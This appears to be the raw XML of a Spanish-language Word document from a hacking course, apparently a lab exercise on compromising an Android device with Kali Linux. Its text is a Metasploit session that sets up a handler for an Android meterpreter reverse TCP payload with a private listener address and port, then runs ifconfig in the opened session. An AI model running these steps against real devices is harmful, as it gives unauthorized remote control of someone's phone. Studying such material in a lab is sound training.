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327DF" w14:textId="6C83B7DB" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:permStart w:id="892481783" w:edGrp="everyone"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E85393" wp14:editId="0F62BA3A">
                <wp:extent cx="5734050" cy="1295400"/>
                <wp:effectExtent l="0" t="0" r="0" b="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53780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56930820" w:edGrp="everyone"/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so hacking a Dispositivo con Kali Linux </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11EF328C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xion</w:t>
                            </w:r>
                            <w:permEnd w:id="5569308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E8539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51.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" filled="f" stroked="f">
                <v:fill o:detectmouseclick="t"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7DC53780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556930820" w:edGrp="everyone"/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rso hacking a Dispositivo con Kali Linux </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11EF328C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utaxion</w:t>
                      </w:r>
                      <w:permEnd w:id="556930820"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:permEnd w:id="892481783"/>
    </w:p>
    <w:p w14:paraId="2BED8282" w14:textId="4364132C" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B48FAA" w14:textId="77777777" w:rsidR="00BF72A6" w:rsidRDefault="009A65A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF9F0C3" wp14:editId="02962683">
            <wp:extent cx="6067425" cy="582917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ax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34" cy="58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FD1" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0"/>
    <w:p w14:paraId="6830CA2E" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:~# msfconsole </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C93010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 xml:space="preserve">msf5 &gt; use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B45981F" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set payload android/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E9D3F2" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; android/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074E054" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LhOST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.52.197</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECEC231" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LhOST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; 192.168.52.197</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFCBD2D" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msf5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set LPORT 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F22610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>LPORT =&gt; 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AB0EED" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17686F25" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7C9824" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E54B4E" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; ifconfig </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6186F24F" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="110AAE06" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Interface  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61C2D02E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>============</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B950CD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>Name         : wlan0 - wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D8504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 xml:space="preserve">Hardware </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 34:a8:8a:50:0d:ac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC4BB4E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 xml:space="preserve">IPv4 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Address :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09525271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 xml:space="preserve">IPv4 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Netmask :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 255.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363167E2" w14:textId="77777777" w:rsidR="005254BB" w:rsidRPr="005254BB" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv6 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Address :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> fe80::36a8:8aff:fe50:dac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30705560" w14:textId="206B10BC" w:rsidR="009A65A0" w:rsidRPr="005433ED" w:rsidRDefault="005254BB" w:rsidP="005254BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IPv6 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Netmask :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005254BB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ::</w:t>
      </w:r>
      <w:r w:rsidR="009A65A0">
        <w:rPr>
          <w:rStyle w:val="Refdecomentario"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="60880237" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="005433ED" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009A65A0" w:rsidRPr="005433ED" w:rsidSect="009E6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1-28T23:41:00Z" w:initials="U">
    <w:p w14:paraId="7865A683" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:pStyle w:val="Textocomentario"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdecomentario"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="009E6905">
        <w:t xml:space="preserve">Pablo Ezequiel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E6905">
        <w:t>Cordob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5A68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A0"/>
    <w:rsid w:val="001B0578"/>
    <w:rsid w:val="00226754"/>
    <w:rsid w:val="0032529E"/>
    <w:rsid w:val="005254BB"/>
    <w:rsid w:val="005433ED"/>
    <w:rsid w:val="009A65A0"/>
    <w:rsid w:val="009E6905"/>
    <w:rsid w:val="00A13917"/>
    <w:rsid w:val="00B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C596"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0FE223E6-DC51-4EAB-9338-586ABEAD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6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9A65A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65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6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5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5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5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EC89-D513-432B-95DE-4821027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9T03:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-29T03:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>